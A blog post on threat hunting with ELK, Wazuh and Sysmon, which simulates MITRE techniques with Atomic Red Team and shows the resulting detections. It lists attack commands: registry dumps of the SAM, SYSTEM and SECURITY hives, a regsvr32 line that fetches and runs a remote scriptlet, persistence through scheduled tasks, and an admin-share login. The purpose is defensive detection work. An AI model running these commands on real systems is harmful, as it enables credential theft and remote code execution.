Threat Hunting with ELK + Wazuh

Abhijith Rao
4 min readFeb 24, 2020

--

With Sysmon configured on endpoints, ELK + Wazuh stack will facilitate greatly in performing Threat Hunting operations.

Catch me if you can :)
Catch Me If You Can :)

We know that threat landscape is increasing exponentially day by day and perpetrators are employing sophisticated techniques to fly always under radar. So, it is highly important for SOC teams to accelerate the detection capabilities to identify the well-known TTPs at the first place.

This post will highlight, how Detection capabilities can be leveraged with help of Blue-team’s arsenal Sysmon. The thumb rule of Blue Team is — The More Quality Logs the organization stores, easier the detections.

To get started, below open source tools are used:

  1. ELK
  2. Wazuh
  3. Sysmon — (config file: sysmon-modular)
  4. Atomic Red Team (ART)

Background: Wazuh is Opensource HIDS and forked project of OSSEC which has capability to act of HIDS, Detect Rootkits, Endpoint logs shippers to SIEM for enhanced Security Analytics. It has additional fantastic features not limited to File Integrity Monitoring, Vulnerability Detection, Compliance solutions etc.,

Atomic Red Team (ART) comes with multiple MITRE Techniques testing scenarios. The coverage area by ART can be found below-

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/windows-index.md

Here, below Techniques are tested for simulation purpose and same can be considered to write correlation logic rules in SIEM –

  1. T1003 — Credential Dumping
  2. T1037 — Logon Scripts && T1053 Scheduled Task
  3. T1018 — Remote Host Discovery && T1077 — Windows Admin Shares
  4. T1117 — Regsvr32

OKAY!! Let us go practical and the see how the results will appear for these MITRE Techniques ʕ•ᴥ•ʔ

  1. T1003 — Credential Dumping

The credentials dumping is process of obtaining the username, password information (clear text/hashes), tickets and post dumping will leverage the attacker to perform chain of activities to fulfill their objectives.

There are several areas where credentials will get stored or can be retrieved from the Windows OS. Some of the them are -

  • SAM
  • LSA Secrets
  • Lsass.exe process memory
  • Service Principle Names (SPN)
  • Cached Credentials
  • Registry files

To fetch this credential information, there are confirmed evidences where adversaries had used some of below tools in the past in the series of compromising environment.

  • Mimikatz
  • gsecdump
  • Secretdump
  • Windows Credential editor
  • Metasploit modules
  • Powersploit
  • Empire

Let us see how SAM dumping looks like in SIEM Incidents —

Commands used on victim machine

reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
T1003 — Registry dump of SAM, creds, and secrets

The alerts received on ELK —

Sysmon Events
Sysmon Event ID 1

2. T1117 — Regsvr32

Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. Regsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via Component Object Model Hijacking.

Command used on victim machine –

regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
T1117 — Regsvr32

The alerts received on ELK —

Sysmon Events
Sysmon Event ID 1
Sysmon Event ID 3
Sysmon Event ID 7

3. T1037 — Logon Scripts && T1053 Scheduled Task

Commands used on victim machine –

schtasks /create /tn “T1037_OnLogon” /sc onlogon /tr “cmd.exe /c calc.exe”schtasks /create /tn “T1037_OnStartup” /sc onstart /ru system /tr “cmd.exe /c calc.exe”
T1037 — Logon Script && T1053 Scheduled Task

The alerts received on ELK —

Sysmon Events
Sysmon Event ID 1

4. T1018 — Remote Host Discovery && T1077 — Windows Admin Shares

Command used on victim machine –

cmd.exe /c “net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator”
T1077 — Windows Admin Shares

The alerts received on ELK —

Sysmon Events
Sysmon Event ID 1

Big shout out to Olaf Hartong (@olafhartong), Atomic Red Team (ART) to use their projects for learning purpose.

Happy Blue Teaming!

Reference:

https://wazuh.com/product/

https://github.com/olafhartong/sysmon-modular

https://github.com/redcanaryco/atomic-red-team

--

--